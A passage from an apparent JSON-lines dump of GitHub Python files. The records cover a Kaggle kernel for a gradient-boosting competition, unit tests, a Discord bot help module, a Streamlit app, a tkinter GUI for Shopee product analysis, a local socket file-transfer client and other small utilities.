predicted, the previous are scraped\n\n if test_set:\n\n return all_assessments[-1]\n\n # in the train_set, all assessments goes to the dataset\n\n return all_assessments\ndef get_train_and_test(train, test):\n\n compiled_train = []\n\n compiled_test = []\n\n for i, (ins_id, user_sample) in tqdm(enumerate(train.groupby('installation_id', sort = False)), total = 17000):\n\n compiled_train += get_data(user_sample)\n\n for ins_id, user_sample in tqdm(test.groupby('installation_id', sort = False), total = 1000):\n\n test_data = get_data(user_sample, test_set = True)\n\n compiled_test.append(test_data)\n\n reduce_train = pd.DataFrame(compiled_train)\n\n reduce_test = pd.DataFrame(compiled_test)\n\n categoricals = ['session_title']\n\n return reduce_train, reduce_test, categoricals\ndef run_feature_selection(reduce_train, reduce_test, usefull_features, new_features):\n\n kf = StratifiedKFold(n_splits = 10, shuffle = True, random_state = 42)\n\n target = 'accuracy_group'\n\n oof_pred = np.zeros((len(reduce_train), 4))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[usefull_features].iloc[tr_ind], reduce_train[usefull_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n train_set = lgb.Dataset(x_train, y_train, categorical_feature = categoricals)\n\n val_set = lgb.Dataset(x_val, y_val, categorical_feature = categoricals)\n\n\n\n params = {\n\n 'learning_rate': 0.01,\n\n 'metric': 'multiclass',\n\n 'objective': 'multiclass',\n\n 'num_classes': 4,\n\n 'feature_fraction': 0.75,\n\n 'subsample': 0.75,\n\n 'n_jobs': -1,\n\n 'seed': 50,\n\n 'max_depth': 10\n\n }\n\n\n\n model = lgb.train(params, train_set, num_boost_round = 100000, early_stopping_rounds = 100, \n\n valid_sets=[train_set, val_set], verbose_eval = 500)\n\n oof_pred[val_ind] = model.predict(x_val)\n\n # using cohen_kappa because it's the evaluation metric of the competition\n\n loss_score = cohen_kappa_score(reduce_train[target], np.argmax(oof_pred, axis = 1), weights = 'quadratic')\n\n score = loss_score\n\n usefull_new_features = []\n\n for i in new_features:\n\n oof_pred = np.zeros((len(reduce_train), 4))\n\n evaluating_features = usefull_features + usefull_new_features + [i]\n\n print('Evaluating {} column'.format(i))\n\n print('Out best cohen kappa score is : {}'.format(score))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[evaluating_features].iloc[tr_ind], reduce_train[evaluating_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n train_set = lgb.Dataset(x_train, y_train, categorical_feature = categoricals)\n\n val_set = lgb.Dataset(x_val, y_val, categorical_feature = categoricals)\n\n\n\n model = lgb.train(params, train_set, num_boost_round = 100000, early_stopping_rounds = 100, \n\n valid_sets=[train_set, val_set], verbose_eval = 500)\n\n oof_pred[val_ind] = model.predict(x_val)\n\n loss_score = cohen_kappa_score(reduce_train[target], np.argmax(oof_pred, axis = 1), weights = 'quadratic')\n\n print('Our new cohen kappa score is : {}'.format(loss_score))\n\n if loss_score > score:\n\n print('Feature {} is usefull, adding feature to usefull_new_features_list'.format(i))\n\n usefull_new_features.append(i)\n\n score = loss_score\n\n else:\n\n print('Feature {} is useless'.format(i))\n\n gc.collect()\n\n print('The best features are: ', usefull_new_features)\n\n print('Our best cohen kappa score is : ', score)\n\n\n\n return usefull_features + usefull_new_features\ndef run_lgb_regression(reduce_train, reduce_test, usefull_features, n_splits, random_state=42):\n\n kf = StratifiedKFold(n_splits=n_splits, shuffle = True, random_state = random_state)\n\n target = 'accuracy_group'\n\n oof_pred = np.zeros((len(reduce_train), ))\n\n y_pred = np.zeros((len(reduce_test), ))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[usefull_features].iloc[tr_ind], reduce_train[usefull_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n train_set = lgb.Dataset(x_train, y_train, categorical_feature=categoricals)\n\n val_set = lgb.Dataset(x_val, y_val, categorical_feature=categoricals)\n\n\n\n params = {'n_estimators':5000,\n\n 'boosting_type': 'gbdt',\n\n 'objective': 'regression',\n\n 'metric': 'rmse',\n\n 'subsample': 0.75,\n\n 'subsample_freq': 1,\n\n 'learning_rate': 0.01,\n\n 'feature_fraction': 0.9,\n\n 'max_depth': 15,\n\n 'lambda_l1': 1, \n\n 'lambda_l2': 1,\n\n 'verbose': 100,\n\n 'early_stopping_rounds': 100\n\n }\n\n\n\n model = lgb.train(params, train_set, num_boost_round = 1000000, early_stopping_rounds = 300, \n\n valid_sets=[train_set, val_set], verbose_eval = 100)\n\n oof_pred[val_ind] = model.predict(x_val)\n\n y_pred += model.predict(reduce_test[usefull_features]) / n_splits\n\n _, loss_score, _ = eval_qwk_lgb_regr(reduce_train[target], oof_pred)\n\n print('Our oof cohen kappa score is: ', loss_score)\n\n\n\n return y_pred\n\ndef run_xgb_regression(reduce_train, reduce_test, usefull_features, n_splits, random_state=42):\n\n kf = StratifiedKFold(n_splits=n_splits, shuffle = True, random_state = random_state)\n\n target = 'accuracy_group'\n\n oof_pred = np.zeros((len(reduce_train), ))\n\n y_pred = np.zeros((len(reduce_test), ))\n\n for fold, (tr_ind, val_ind) in enumerate(kf.split(reduce_train, reduce_train[target])):\n\n print('Fold {}'.format(fold + 1))\n\n x_train, x_val = reduce_train[usefull_features].iloc[tr_ind], reduce_train[usefull_features].iloc[val_ind]\n\n y_train, y_val = reduce_train[target][tr_ind], reduce_train[target][val_ind]\n\n xgb_train = xgb.DMatrix(x_train, y_train)\n\n xgb_eval = xgb.DMatrix(x_val, y_val)\n\n\n\n pars = {\n\n 'colsample_bytree': 0.8, \n\n 'learning_rate': 0.01,\n\n 'max_depth': 10,\n\n 'subsample': 1,\n\n 'objective':'reg:squarederror',\n\n #'eval_metric':'rmse',\n\n 'min_child_weight':3,\n\n 'gamma':0.25,\n\n 'n_estimators':5000\n\n }\n\n\n\n model = xgb.train(pars,\n\n xgb_train,\n\n num_boost_round=5000,\n\n evals=[(xgb_train, 'train'), (xgb_eval, 'val')],\n\n verbose_eval=100,\n\n early_stopping_rounds=100\n\n )\n\n \n\n val_X=xgb.DMatrix(x_val)\n\n oof_pred[val_ind] = model.predict(val_X)\n\n test_X = xgb.DMatrix(reduce_test[usefull_features])\n\n y_pred += model.predict(test_X) / n_splits\n\n _, loss_score, _ = eval_qwk_lgb_regr(reduce_train[target], oof_pred)\n\n print('Our oof cohen kappa score is: ', loss_score)\n\n\n\n return y_pred\n\n#import gc\n\n#del reduce_train, reduce_test\n\n#gc.collect()\n# read data\n\ntrain, test, train_labels, specs, sample_submission = read_data()\n\n# get usefull dict with maping encode\n\ntrain, test, train_labels, win_code, list_of_user_activities, list_of_event_code, activities_labels, assess_titles, list_of_event_id, all_title_event_code = encode_title(train, test, train_labels)\n\n# tranform function to get the train and test set\n\nreduce_train, reduce_test, categoricals = get_train_and_test(train, test)\ndef plot_train_test_comp(feature):\n\n BINS = 50\n\n #data = reduce_train[reduce_train['accuracy_group'] == 3][feature]\n\n data = reduce_train[feature]\n\n train_mean = data.mean()\n\n perc_90 = np.percentile(data, 95)\n\n plt.hist(np.clip(data, 0, perc_90), bins=BINS, color='blue', alpha=0.5, weights=np.ones(len(data)) / len(data))\n\n data = reduce_test[feature] \n\n test_mean = data.mean()\n\n ajust_factor = train_mean / test_mean\n\n plt.hist(np.clip(data * ajust_factor, 0, perc_90), bins=BINS, color='red', alpha=0.5, weights=np.ones(len(data)) / len(data))\n\n plt.show()\n\n\n\nplot_train_test_comp('Clip')\n# call feature engineering function\n\nfeatures = reduce_train.loc[(reduce_train.sum(axis=1) != 0), (reduce_train.sum(axis=0) != 0)].columns # delete useless columns\n\nfeatures = [x for x in features if x not in ['accuracy_group', 'installation_id']]\nto_exclude = []\n\najusted_test = reduce_test.copy()\n\nfor feature in ajusted_test.columns:\n\n if feature not in ['accuracy_group', 'installation_id', 'accuracy_group', 'session_title']:\n\n data = reduce_train[feature]\n\n train_mean = data.mean()\n\n data = ajusted_test[feature] \n\n test_mean = data.mean()\n\n try:\n\n ajust_factor = train_mean / test_mean\n\n if ajust_factor > 10 or ajust_factor < 0.1:\n\n to_exclude.append(feature)\n\n print(feature, train_mean, test_mean)\n\n else:\n\n ajusted_test[feature] *= ajust_factor\n\n except:\n\n to_exclude.append(feature)\n\n print(feature, train_mean, test_mean)\nfeatures = [x for x in features if x not in to_exclude]\n\nreduce_train[features].shape\ny_lgb_pred = 0\n\nfor i in range(10):\n\n y_lgb_pred += run_lgb_regression(reduce_train, ajusted_test, features, 5, random_state=i) / 10\ny_lgb_pred = 0\n\nfor i in range(10):\n\n y_lgb_pred += run_lgb_regression(reduce_train, ajusted_test, features, 5, random_state=i) / 10\n\n\n\ny_xgb_pred = run_xgb_regression(reduce_train, ajusted_test, features, 5)\nlgb_weight = 0.7\n\nfinal_pred = y_lgb_pred * lgb_weight + y_xgb_pred * (1 - lgb_weight)\n\nprint(final_pred.shape, y_lgb_pred.shape, y_xgb_pred.shape)\ndist = Counter(reduce_train['accuracy_group'])\n\nfor k in dist:\n\n dist[k] /= len(reduce_train)\n\nreduce_train['accuracy_group'].hist()\n\n\n\nacum = 0\n\nbound = {}\n\nfor i in range(3):\n\n acum += dist[i]\n\n bound[i] = np.percentile(final_pred, acum * 100)\n\nprint(bound)\n\n\n\ndef classify(x):\n\n if x <= bound[0]:\n\n return 0\n\n elif x <= bound[1]:\n\n return 1\n\n elif x <= bound[2]:\n\n return 2\n\n else:\n\n return 3\n\n \n\nfinal_pred = np.array(list(map(classify, final_pred)))\n\n\n\nsample_submission['accuracy_group'] = final_pred.astype(int)\n\nsample_submission.to_csv('submission.csv', index=False)\n\nsample_submission['accuracy_group'].value_counts(normalize=True)","repo_name":"aorursy/new-nb-1","sub_path":"bamps53_kernel-random10.py","file_name":"bamps53_kernel-random10.py","file_ext":"py","file_size_in_byte":24378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74204724731","text":"import os\nimport unittest\nimport sqlite3\nimport db_setup\n\nDB_NAME = \"data.sqlite\"\n\nclass TestDBSetup(unittest.TestCase):\n \"\"\"\n The TestDBSetup class provides a suite of unit tests to verify the functionality\n of database setup operations as defined in db_setup.py. The tests ensure that:\n - A database connection can be successfully established.\n - The required tables (stock_data and sentiment_data) can be created successfully.\n\n Each test initializes a fresh test database and cleans it up after execution, ensuring\n isolation and preventing side effects between test cases.\n \"\"\"\n def setUp(self):\n # Before each test case, set up a new DB\n db_setup.setup_db()\n\n def tearDown(self):\n # Cleanup after each test by removing the DB\n try:\n os.remove(DB_NAME)\n except:\n pass\n\n def test_database_connection(self):\n conn = db_setup.connect_to_db()\n self.assertIsNotNone(conn)\n conn.close()\n\n def test_create_tables(self):\n conn = sqlite3.connect(DB_NAME)\n cur = conn.cursor()\n\n # Check if stock_data table exists\n cur.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='stock_data'\")\n self.assertEqual(cur.fetchone()[0], 1, \"stock_data table does not exist.\")\n\n # Check if sentiment_data table exists\n cur.execute(\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='sentiment_data'\")\n self.assertEqual(cur.fetchone()[0], 1, \"sentiment_data table does not exist.\")\n\n conn.close()\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"JacobYealy/StockPredictor","sub_path":"tests/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11316242870","text":"import discord\nimport re\n\nimport baseClass\n\ntry:\n import psutil\nexcept ImportError:\n psutil = False\n\nclass help(baseClass.baseClass):\n defaultHelpMessage = {\"title\":\"JoeBot Help\", \"description\":\"Developer: <@365154655313068032> [(GitHub)](https://github.com/JoeBlakeB/DiscordBot)\\n\\nTo use JoeBot, say:\\n**<@796433833296658442> **\\nor **joebot **\\nor **!**\\nor in direct messages with just the command\", \"thumbnail\":\"https://cdn.discordapp.com/avatars/796433833296658442/45d01f0b2d42a5e23e552b75f359525e.png\"}\n helpRegex = False\n async def helpCommand(message, messageContentLower, bot):\n if not help.helpRegex:\n help.compileRegex()\n\n if messageContentLower[0] == \"!\":\n exclamation = True\n messageContentLower = messageContentLower[6:]\n else:\n exclamation = False\n messageContentLower = messageContentLower[12:]\n\n if messageContentLower == \"\":\n return await help.embed(message, help.defaultHelpMessage, await help.jmusicplayerInfo())\n\n for command in help.helpRegex:\n if command.match(messageContentLower):\n if \"embed\" in help.helpRegex[command][0]:\n return await help.embed(message, help.helpRegex[command][1])\n elif \"plaintext\" in help.helpRegex[command][0]:\n return await message.channel.send(help.helpRegex[command][1])\n else:\n if not exclamation:\n await help.embed(message, help.defaultHelpMessage, await help.jmusicplayerInfo())\n\n async def embed(message, embedContent, descriptionExtra = \"\"):\n embed = discord.Embed()\n embed.title = embedContent[\"title\"]\n embed.description = embedContent[\"description\"] + descriptionExtra\n if \"thumbnail\" in embedContent:\n embed.set_thumbnail(url=embedContent[\"thumbnail\"])\n await message.channel.send(embed=embed)\n\n def compileRegex():\n help.helpRegex = {}\n availableCommands = []\n for command in help.help:\n help.helpRegex[re.compile(command)] = help.help[command]\n if \"include\" in help.help[command][0]:\n availableCommands.append(command)\n\n if len(availableCommands) != 0:\n help.defaultHelpMessage[\"description\"] += \"\\n\\nAvailable Commands:\\n\" + \", \".join(availableCommands) + \"\\n\\nUse **<@796433833296658442> help ** for more information.\"\n\n async def jmusicplayerInfo():\n if psutil:\n for proc in psutil.process_iter():\n if len(proc.cmdline()) == 4:\n if proc.cmdline()[:-1] == [\"/usr/bin/java\", \"-Dnogui=true\", \"-jar\"] and \"JMusicBot\" in proc.cmdline()[-1]:\n return \"\\n\\n[JMusicBot](https://github.com/jagrosh/MusicBot) is currently running on JoeBot, use **!MusicHelp** for help music commands.\"\n return \"\"\n\n\nhelp.mentionedCommands[\"help(?!\\S)\"] = [help.helpCommand, [\"message\", \"messageContentLower\", \"bot\"], {}]\nhelp.exclamationCommands[\"help(?!\\S)\"] = [help.helpCommand, [\"message\", \"messageContentLower\", \"bot\"], {}]\n","repo_name":"JoeBlakeB/DiscordBot","sub_path":"modules/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74010395130","text":"#!/usr/bin/env python3\n\nimport time\nfrom cli import ArgumentParser\nfrom cli.actions import ActionFactory\n\n\ndef main():\n start = time.time()\n args = ArgumentParser().parse_args()\n\n try:\n action = ActionFactory.create_action(args)\n for benchmark in args.benchmarks:\n action(benchmark)\n except Exception as e:\n print(e)\n exit()\n\n print(f\"Elapsed time: {time.time() - start} s\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"julian-muellner/blizzard","sub_path":"blizzard.py","file_name":"blizzard.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3209408705","text":"import streamlit as st\n\ndef ricerca_stand(col, nome, cognome, stand):\n query_string = {}\n\n if nome != \"\":\n query_string[\"nome\"] = nome\n\n if cognome != \"\":\n query_string[\"cognome\"] = cognome\n\n res = list(col.find(query_string))\n\n if len(res) == 0:\n st.error(\"Nessun risultato\")\n elif len(res) != 1:\n st.error(\"Errore: più risultati trovati.\")\n elif res[0][\"stand_visitati\"][stand]:\n st.error(nome+\" \"+ cognome + \" ha già visitato questo stand!\")\n else:\n numero = res[0][\"coppia\"][\"_id\"]\n col.update_one(res[0], {\"$set\": {\"stand_visitati.\"+stand:True}})\n st.success(\"Consegna la busta numero \" + str(numero))\n\ndef stand(col):\n stands = {\n \"A\": \"Colore preferito\",\n \"B\": \"Età\",\n \"C\": \"Cibo preferito\",\n \"D\": \"Sport o hobby\",\n \"E\": \"Cosa vuoi fare da grande\",\n \"F\": \"Serie TV preferita\",\n \"G\": \"Cantante/Gruppo preferito\",\n \"H\": \"Gioco preferito al campo\",\n \"I\": \"Materia preferita a scuola\",\n \"L\": \"Youtuber preferito\",\n }\n labels = [ key + \" - \" + stands[key] for key in stands]\n\n st.title(\"Stand\")\n with st.form(\"Ricerca stand\"):\n st.write(\"Seleziona stand\")\n label = st.selectbox(\"Stand\", labels) #cachare questa risposta\n st.write(\"Inserisci nome e cognome\")\n nome = st.text_input('Inserisci nome')\n cognome = st.text_input('Inserisci cognome')\n # Every form must have a submit button.\n submitted = st.form_submit_button(\"Cerca\")\n if submitted:\n selected_stand = label.split(\" - \")[0]\n ricerca_stand(col, nome, cognome, selected_stand)\n\n\n","repo_name":"francescodeaglio/opening22","sub_path":"stand_individui.py","file_name":"stand_individui.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24585574530","text":"import unittest\nimport time\n# import re\n# import HtmlTestRunner\nfrom selenium import webdriver\n# from selenium.webdriver.common.by import By\n# from selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.support.ui import Select\n# from selenium.common.exceptions import NoSuchElementException\n# from selenium.common.exceptions import NoAlertPresentException\n# from selenium.common.exceptions import TimeoutException\n# from selenium.webdriver.support.ui import WebDriverWait\n# from selenium.webdriver.support import expected_conditions as EC\n\n\nclass SearchText(unittest.TestCase):\n @classmethod\n def setUp(cls):\n cls.driver = webdriver.Chrome(executable_path=\"../drivers/chromedriver.exe\")\n cls.driver.implicitly_wait(10)\n cls.driver.maximize_window()\n cls.driver.get(\"http://www.google.com/\")\n\n def test_search_by_text(self):\n self.search_field = self.driver.find_element_by_name(\"q\")\n # self.search_field.send_keys(\"Selenium WebDriver Interview questions\")\n self.search_field.submit()\n\n #\n # lists = self.driver.find_elements_by_class_name(\"r\")\n # no=len(lists)\n # self.assertEqual(11, len(lists))\n @classmethod\n def tearDown(cls):\n time.sleep(2)\n cls.driver.close()\n cls.driver.quit()\n print('TEST COMPLETE')\n\n if __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","repo_name":"Kaythreefelix/dsProd_Framework","sub_path":"demoTests/googleTemplate.py","file_name":"googleTemplate.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43326476224","text":"from typing import cast\n\nimport pytest\nfrom aiohttp import ClientResponseError, ClientSession\nfrom aiohttp.test_utils import TestClient\nfrom aiohttp.web import Application, Request, Response\n\nfrom fetchartifact import fetch_artifact, fetch_artifact_chunked\n\nTEST_BUILD_ID = \"1234\"\nTEST_TARGET = \"linux\"\nTEST_ARTIFACT_NAME = \"output.zip\"\nTEST_DOWNLOAD_URL = (\n f\"/android/internal/build/v3/builds/{TEST_BUILD_ID}/{TEST_TARGET}/\"\n f\"attempts/latest/artifacts/{TEST_ARTIFACT_NAME}/url\"\n)\nTEST_RESPONSE = b\"Hello, world!\"\n\n\n@pytest.fixture(name=\"android_ci_client\")\nasync def fixture_android_ci_client(aiohttp_client: type[TestClient]) -> TestClient:\n \"\"\"Fixture for mocking the Android CI APIs.\"\"\"\n\n async def download(_request: Request) -> Response:\n return Response(text=TEST_RESPONSE.decode(\"utf-8\"))\n\n app = Application()\n app.router.add_get(TEST_DOWNLOAD_URL, download)\n return await aiohttp_client(app) # type: ignore\n\n\nasync def test_fetch_artifact(android_ci_client: TestClient) -> None:\n \"\"\"Tests that the download URL is queried.\"\"\"\n assert TEST_RESPONSE == await fetch_artifact(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n query_url_base=\"\",\n )\n\n\nasync def test_fetch_artifact_chunked(android_ci_client: TestClient) -> None:\n \"\"\"Tests that the full file contents are downloaded.\"\"\"\n assert [c.encode(\"utf-8\") for c in TEST_RESPONSE.decode(\"utf-8\")] == [\n chunk\n async for chunk in fetch_artifact_chunked(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n chunk_size=1,\n query_url_base=\"\",\n )\n ]\n\n\nasync def test_failure_raises(android_ci_client: TestClient) -> None:\n \"\"\"Tests that fetch failure raises an exception.\"\"\"\n with pytest.raises(ClientResponseError):\n await fetch_artifact(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n query_url_base=\"/bad\",\n )\n\n with pytest.raises(ClientResponseError):\n async for _chunk in fetch_artifact_chunked(\n TEST_TARGET,\n TEST_BUILD_ID,\n TEST_ARTIFACT_NAME,\n cast(ClientSession, android_ci_client),\n query_url_base=\"/bad\",\n ):\n pass\n\n\n@pytest.mark.requires_network\nasync def test_real_artifact() -> None:\n \"\"\"Tests with a real artifact. Requires an internet connection.\"\"\"\n async with ClientSession() as session:\n contents = await fetch_artifact(\"linux\", \"9945621\", \"logs/SUCCEEDED\", session)\n assert contents == b\"1681499053\\n\"\n","repo_name":"aosp-mirror/platform_development","sub_path":"python-packages/fetchartifact/tests/test_fetchartifact.py","file_name":"test_fetchartifact.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":2703,"dataset":"github-code","pt":"78"} +{"seq_id":"30131703417","text":"import numpy as np\nfrom S3T2_solve_ode.py.one_step_methods import OneStepMethod\n\n\n# coefficients for Adams methods\nadams_coeffs = {\n 1: [1],\n 2: [-1 / 2, 3 / 2],\n 3: [5 / 12, -4 / 3, 23 / 12],\n 4: [-3 / 8, 37 / 24, -59 / 24, 55 / 24],\n 5: [251 / 720, -637 / 360, 109 / 30, -1387 / 360, 1901 / 720]\n}\n\n\ndef adams(func, y_start, T, coeffs, one_step_method: OneStepMethod):\n \"\"\"\n T: list of timestamps\n coeffs: list of coefficients\n one_step_method: method for initial steps\n return list of t (same as T), list of y\n \"\"\"\n raise NotImplementedError\n","repo_name":"7KASPAR7/University-Homeworks","sub_path":"sem4/chm-master/S3T2_solve_ode/py/multistep_methods.py","file_name":"multistep_methods.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31839436474","text":"import tkinter\nfrom tkinter import *\nimport shopee_data as sd\nimport matplotlib.pyplot as plt\nimport map\nfrom graphic_data import draw_scatter_figure, show_GUI_table\nfrom tkhtmlview import HTMLLabel\n\n\n# tkinter 套件\n# 建立容器 tkinter.Tk()\n# 設定視窗名子 .title\n# 各類元件\n# 建立框架 Frame()\n# 標籤 label() (放圖或文字)\n# 按鈕 button() (透過event觸發寫好的函式)\n# 布局\n# 設定布局 grid() (從左上 0,0開始)\n# 控制視窗\n# tk.mainloop() (一直顯示)\n# destroy() 關掉該視窗\ndef inputbox():\n def button_event():\n root.destroy()\n\n root = tkinter.Tk()\n root.title('今天什麼最銷售')\n root.geometry('400x100')\n title = tkinter.Label(root, text='輸入想查詢的商品', bg='yellow', fg='#263238', font=('Arial', 12))\n title.grid(row=0, column=0)\n var = tkinter.StringVar()\n myentry = tkinter.Entry(root, width=20, textvariable=var)\n myentry.grid(row=0, column=1)\n mybutton = tkinter.Button(root, text='Search', command=button_event)\n mybutton.grid(row=1, column=1)\n root.mainloop()\n return var.get()\n\n\ndef mainframe(df,df1,keyword):\n def create_map():\n GUI_4() #地圖\n\n def action1():\n show_graph() # 畫圓餅圖\n\n def action2():\n draw_scatter_figure(df1) #列出4大種類\n\n def action3():\n GUI_3(df) #同類商品價格\n t = tkinter.Tk()\n button_width = 34\n button_height = 4\n t.title('蝦皮產品分析')\n start_frame = Frame(width=1000, height=500)\n button_frame = Frame(width=1000, height=100, pady=10)\n start_frame.grid(row=0, column=0)\n button_frame.grid(row=2, column=0)\n\n fontStyle = tkinter.font.Font(family=\"Lucida Grande\", size=30)\n fontStyle2 = tkinter.font.Font(family=\"Lucida Grande\", size=20)\n button_fontStyle = tkinter.font.Font(family=\"Lucida Grande\", size=10)\n\n button1 = Button(button_frame, text='目前最熱門', width=button_width, height=button_height, command=action1,font=button_fontStyle,fg='SlateGray')\n button1.grid(row=2, column=0)\n button2 = Button(button_frame, text='商品價格分布(以除去離群值)', width=button_width, height=button_height, command=action2, font=button_fontStyle,\n fg='SlateGray')\n button2.grid(row=2, column=1)\n button3 = Button(button_frame, text='同類商品價格查詢', width=button_width, height=button_height, command=action3,font=button_fontStyle,\n fg='SlateGray')\n button3.grid(row=2, column=2)\n exit = Button(button_frame, text='產生地圖', width=button_width, height=button_height, command=create_map,\n font=button_fontStyle, fg='SlateGray')\n exit.grid(row=2, column=3)\n label= Label(start_frame, text=\"現在搜尋的是蝦皮商場上\"+keyword+\"的資訊\"+\"\\n\\n\\n\\n\\n本程式想要利用競品情報來提高自己銷售業績:\\n 1.找出目前最熱門商品的特性\\n 2.上架商品價格分析\\n 3.商品訂價策略\", justify=LEFT,\n bd=180, font=fontStyle2, fg='SlateGray')\n label.grid(row=0, column=0)\n\n exit.grid(row=2, column=3)\n start_frame.grid_propagate(0)\n button_frame.grid_propagate(0)\n t.mainloop()\n return\n\n\ndef show_graph():\n plt.style.use('ggplot')\n plt.rcParams['font.family'] = 'DFKai-SB'\n df = sd.count()\n df['出現次數'].plot(kind='pie', title='圓餅圖', figsize=(4, 4))\n plt.show()\n return\n\n\ndef GUI_3(df):\n def button_event():\n # 將取到的價格轉數字以利於比大小\n low = int(myentry1.get())\n high = int(myentry2.get())\n df2 = df[(df['價格'] > low) & (df['價格'] < high)]\n #補齊index\n df2 = df2.reset_index(drop=True)\n #關掉視窗\n root.destroy()\n show_GUI_table(df2)\n\n\n root = tkinter.Tk()\n root.title('同類商品價格查詢')\n root.geometry('400x100')\n title = tkinter.Label(root, text='同類商品價格查詢', bg='yellow', fg='#263238', font=('Arial', 12))\n title.grid(row=0, column=0)\n #tkinter entry 輸入的變數要是stringVar\n #設定 => stringVar.set()\n #書櫥 => stringVar.get()\n var1 = tkinter.StringVar()\n var2 = tkinter.StringVar()\n myentry1 = tkinter.Entry(root, width=20, textvariable=var1)\n myentry1.grid(row=1, column=0)\n text1 = tkinter.Label(root, text='到', bg='yellow', fg='#263238', font=('Arial', 12))\n text1.grid(row=1, column=1)\n myentry2 = tkinter.Entry(root, width=20, textvariable=var2)\n myentry2.grid(row=1, column=2)\n mybutton = tkinter.Button(root, text='Search', command=button_event)\n mybutton.grid(row=2, column=2)\n root.mainloop()\n return\ndef GUI_4():\n map.createMap()\n\n root = tkinter.Tk()\n root.title(\"showMap\")\n root.geometry(\"200x200\")\n #有能夠接受html格式參數的label\n mylabel = HTMLLabel(root , html =r\"

    Go to map!!!

    \")\n\n mylabel.grid(row = 0 , column = 0)\n root.mainloop()\n\n","repo_name":"brankhsu/python-project-crawler","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73185994492","text":"import socket\r\nimport time\r\nimport sys\r\nfrom termcolor import colored\r\n\r\nADDR = \"127.0.0.1\"\r\nPORT = 22222\r\nENCODER = 'utf-8'\r\n\r\ndef startClient():\r\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client_socket.connect((ADDR, PORT))\r\n print(colored(\"\\n* Connection established! \\n\", \"blue\"))\r\n\r\n try:\r\n while True:\r\n message = client_socket.recv(1024).decode(ENCODER)\r\n\r\n print(message)\r\n\r\n client_socket.send(\"\\n You are connected to the client... \\n\".encode(ENCODER))\r\n\r\n print(colored(\"\\n* Enter the file name to be downloaded... \\n\", \"yellow\"))\r\n user_input_filename = input(\"\\n* Client: \\n\")\r\n\r\n with open(user_input_filename, 'wb') as f:\r\n print(colored(\"\\n* File opened... \\n\", \"blue\"))\r\n while True:\r\n data = client_socket.recv(1024)\r\n if not data:\r\n break\r\n f.write(data)\r\n f.close()\r\n print(colored(\"\\n* Successfully get the file! \\n\", \"blue\"))\r\n client_socket.close()\r\n\r\n except KeyboardInterrupt:\r\n print(colored(\"\\n* Program end! \\n\", \"red\"))\r\n client_socket.close()\r\n \r\n except ConnectionRefusedError:\r\n print(colored(\"\\n* Server has not started make sure the server is running... \\n\", \"red\"))\r\n\r\nif __name__ == '__main__':\r\n startClient()","repo_name":"AdamOlTR/Server-Client-Image-Transfer-with-http-https-request","sub_path":"python-multiple-images-transfer-using-sockets/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29549625079","text":"def rev_word(str, start, end):\r\n return str[start:end][::-1]\r\n\r\n\r\ndef rev_string(str):\r\n start = 0\r\n idx = 0\r\n out = \"\"\r\n if len(str) == 0 or str.isspace():\r\n return \"Please give me good input\"\r\n for char in str:\r\n if char == \" \":\r\n end = idx\r\n out += rev_word(str, start, end) + \" \"\r\n start = idx\r\n idx += 1\r\n out = out[0:len(out)-1]\r\n out += rev_word(str, end+1, len(str))\r\n if out == \"\":\r\n return str[::-1]\r\n return out\r\n\r\n","repo_name":"estara/reverse-words","sub_path":"reverse_words.py","file_name":"reverse_words.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24450240571","text":"'''\nINTRODUCTION:\nBuilding a conversion function\nYou've been doing a lot of 